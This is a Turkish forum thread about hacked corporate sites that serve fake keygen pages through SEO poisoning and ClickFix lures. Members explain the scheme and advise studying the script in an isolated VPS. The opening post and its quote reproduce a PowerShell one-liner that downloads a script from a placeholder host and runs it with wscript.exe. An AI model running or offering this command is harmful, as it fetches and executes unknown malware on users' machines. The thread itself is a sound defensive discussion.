• 21-08-2026, 13:22:57
    #1
    Bugün internette dolaşırken ilginç bir durum fark ettim. Bazı kurumsal web sitelerinde /hacks/ adında bir kategori oluşturulmuş ve bu kategori altında çeşitli uygulamaların ücretsiz lisanslarının veya keygen dosyalarının paylaşıldığı iddia ediliyor.
    Buradaki gariplik şu: Söz konusu siteler normalde bu tarz içeriklerle hiçbir ilgisi olmayan kurumsal siteler. Dolayısıyla bu içeriklerin site sahipleri tarafından bilinçli şekilde oluşturulduğunu düşünmüyorum.
    Konuyu biraz daha incelediğimde /hacks/ altında yer alan içeriklerin neredeyse tamamında benzer bir kodla karşılaştım:
    powershell -c "Invoke-WebRequest -Uri 'https://xxx.com/composer.php' -Outfile 'xxx_keygen_worked_x3.js'; Start-Process wscript.exe '.\xxx_keygen_worked_x3.js'"
    Anladığım kadarıyla kullanıcı ilgili butona tıkladığında PowerShell üzerinden xxx.com/composer.php adresine bir istek gönderiliyor. Sunucudan gelen içerik xxx_keygen_worked_x3.js adıyla bilgisayara kaydediliyor ve ardından wscript.exe kullanılarak bu JavaScript dosyası doğrudan çalıştırılıyor.
    Asıl merak ettiğim nokta burası: Bu xxx_keygen_worked_x3.js dosyasının içerisinde ne var ve çalıştırıldığında bilgisayarda tam olarak ne yapıyor?

  • 21-08-2026, 13:30:36
    #2
    bahsettiğiniz site sanırım hacklenmiş hocam site sahibine durumu bildirin bence
  • 21-08-2026, 13:36:10
    #3
    fatihanily adlı üyeden alıntı: mesajı görüntüle
    Bugün internette dolaşırken ilginç bir durum fark ettim. Bazı kurumsal web sitelerinde /hacks/ adında bir kategori oluşturulmuş ve bu kategori altında çeşitli uygulamaların ücretsiz lisanslarının veya keygen dosyalarının paylaşıldığı iddia ediliyor.
    Buradaki gariplik şu: Söz konusu siteler normalde bu tarz içeriklerle hiçbir ilgisi olmayan kurumsal siteler. Dolayısıyla bu içeriklerin site sahipleri tarafından bilinçli şekilde oluşturulduğunu düşünmüyorum.
    Konuyu biraz daha incelediğimde /hacks/ altında yer alan içeriklerin neredeyse tamamında benzer bir kodla karşılaştım:
    powershell -c "Invoke-WebRequest -Uri 'https://xxx.com/composer.php' -Outfile 'xxx_keygen_worked_x3.js'; Start-Process wscript.exe '.\xxx_keygen_worked_x3.js'"
    Anladığım kadarıyla kullanıcı ilgili butona tıkladığında PowerShell üzerinden xxx.com/composer.php adresine bir istek gönderiliyor. Sunucudan gelen içerik xxx_keygen_worked_x3.js adıyla bilgisayara kaydediliyor ve ardından wscript.exe kullanılarak bu JavaScript dosyası doğrudan çalıştırılıyor.
    Asıl merak ettiğim nokta burası: Bu xxx_keygen_worked_x3.js dosyasının içerisinde ne var ve çalıştırıldığında bilgisayarda tam olarak ne yapıyor?

    Selam, güzel yakalamışsın aslında burada kafanı karıştıran şey normal çünkü ortada iki ayrı numara aynı anda dönüyor

    Saldırgan güvenlik açığı olan sitelere (genelde güncellenmemiş WordPress/eklenti) sızıp /hacks/ gibi dizinler açıyor ve o sitenin Google deki itibarını kullanarak şu program keygen ücretsiz aramalarında üst sıralara çıkıyor. Buna SEO poisoning (SEO zehirleme) deniyor. Google botuna temiz sayfa gerçek ziyaretçiye zararlı sayfa gösterdikleri için site sahibinin çoğu zaman haberi bile olmuyor ekrandaki o sahte CAPTCHA da işin ikinci ayağı adı ClickFix Mantığı çok basit ama bir o kadar etkili kullanıcıyı bir metni kopyalayıp kendi eliyle çalıştırmaya ikna ediyor böylece antivirüs kullanıcı zaten kendi isteğiyle çalıştırdı diye çoğu zaman araya girmiyor.

    PowerShell Invoke-WebRequest ile composer.php'ye istek atıyor dönen içeriği xxx_keygen_worked_x3.js adıyla diske kaydediyor wscript.exe ile o JS'yi çalıştırıyor

    Yani teknik olarak bir çok adım ve detayı var ama burada bunları açıkça yazamam eğer yakınınıza ait veya kendinizi geliştirmek için soruyorsanız özelden ulaşabilirsiniz.
  • 21-08-2026, 13:38:04
    #4
    değerli hocalarım,
    siteler bana ya da bir yakınıma ait değil ve site 1 adet 2 adet de değil. benim tarayarak bulduğum 45-50'ye yakın site bulunuyor bu şekilde. ben de korsan bir eklentiden-temadan şüpheleniyordum ancak sitelerin çoğu kurumsal website. kurumsal olmalarından kaynaklı korsan bir eklenti / tema kullanabileceklerini düşünmüyorum.
  • 21-08-2026, 13:49:54
    #5
    Bir çok açık önce suistimal edilir bilenler tarafından, özellikle büyük sitelerde vs. ondan sonra exploit olarak açık dizinlerde yayınlanır.
    Tamamen suçu önceden olsa null eklentiler, temalar, araçlara bağlardık ama artık öyle değil geçenlerde elementor için shell upload etmeye yönelik açıklar belirmişti, ondan önce wordpress 7.0.1 ve öncesini etkileyen açıklar belirmişti, ondan önce cpanel kapsamında açıklar çıkmıştı en son da vmware açığı çıkmıştı. Yani artık suçu tamamen eklentilere vs yüklemek çok zor, çünkü öyle açıklar peş peşe geliyor ki eklentiler ile vs uğraşmak bunların yanında zor kalıyor öyle söyleyeyim. Şimdi son zamanların açıklarından faydalanılabiliyor olabilirler çünkü kurumsal dediğimiz firmaların çoğu bu tür konulara karşı özellikle bir gayret peşinde değil, cpanel kurdularsa sürüm yükseltmezler, wp ise güncelleme yapmaya üşenebilirler, ajanslar kurmuş bırakmış olabilir vs vs. Saymakla bitmeyecek kadar güvenlik açıkları var, eskisinden daha ciddi şekilde peş peşe gelmeye başladı bunlar internet tarihinin güvenlik konusunda en zorlu olduğu dönemden muhtemelen ai modelleri nedeniyle geçiyoruz.
    Bunlar olmasa dahi ileride duyacağımız henüz public edilmemiş açıklardan da faydalanılıyor olabilir ama bu uzak bir ihtimal.
  • 21-08-2026, 13:52:42
    #6
    yapay zeka analizi böyle

    Kurumsal Siteler Neden Hedef?

    Saldırganlar bilinçli olarak kurumsal/güvenilir siteleri hackler çünkü:

    - **Google Safe Browsing** gibi filtrelere takılmaz
    - Kullanıcılar `https://sirketadi.com/hacks/` adresine daha çok güvenir
    - SEO avantajı: arama motorlarında üst sıralarda çıkar
    - Site sahibi fark edene kadar haftalarca kalabilir

    ---

    ## Site Nasıl Hackleniyor?

    Saldırganlar büyük olasılıkla şu yollardan biriyle sisteme sızıyor:

    - **CMS zafiyeti** (WordPress, Joomla vb. güncel olmayan eklentiler)
    - **Zayıf FTP/SSH şifresi**
    - **SQL Injection** ile admin paneline erişim
    - **Hosting paneli açığı** (cPanel, Plesk vb.)

    Girdikten sonra dosya sistemine yeni klasör ve sayfalar ekliyorlar. Site sahibi fark edene kadar —bazen haftalarca— o sayfalar Google'da indexleniyor ve insanlara ulaşıyor.

    ---

    ## Sonuç

    - **Site sahibi de mağdur**, "keygen" arayan kullanıcı da.
    - Tek kazanan **saldırgan**.
    - Site sahibi sitenin hacklendiğini fark etmezse, hem itibar kaybı yaşar hem de kullanıcıların zararlı yazılım bulaştırmasına aracı olur.
  • 21-08-2026, 13:52:51
    #7
    Büyük ihtimalle SEO spam + malware loader. .js dosyasını wscript ile çalıştırması zaten yeterince şüpheli; muhtemelen ikinci payload’ı indiriyor.
  • 21-08-2026, 14:03:16
    #8
    NetTasarim adlı üyeden alıntı: mesajı görüntüle
    Büyük ihtimalle SEO spam + malware loader. .js dosyasını wscript ile çalıştırması zaten yeterince şüpheli; muhtemelen ikinci payload’ı indiriyor.
    Peki bu js'nin içeriğini kendimizi riske sokmadan nasıl kontrol ederiz? bir vds üzerinden testlerimi yapayım ben. js üzerinden ne ele geçirilebilir diye düşünüp duruyorum iki saattir.
  • 21-08-2026, 14:04:33
    #9
    fatihanily adlı üyeden alıntı: mesajı görüntüle
    Peki bu js'nin içeriğini kendimizi riske sokmadan nasıl kontrol ederiz? bir vds üzerinden testlerimi yapayım ben. js üzerinden ne ele geçirilebilir diye düşünüp duruyorum iki saattir.
    Hocam merakınız varsa VDS üzerinde kurcalamak en mantıklısı 😄 Yalnız tamamen izole olsun, kişisel hiçbir hesabınızı açmayın ve öncesinde snapshot alın. Önce JS’yi çalıştırmadan içeriğine bakın; şüpheli URL ve komutlar zaten epey fikir verir. İşiniz bitince de VDS’yi sıfırlarsınız, kafanız rahat olur. 🙂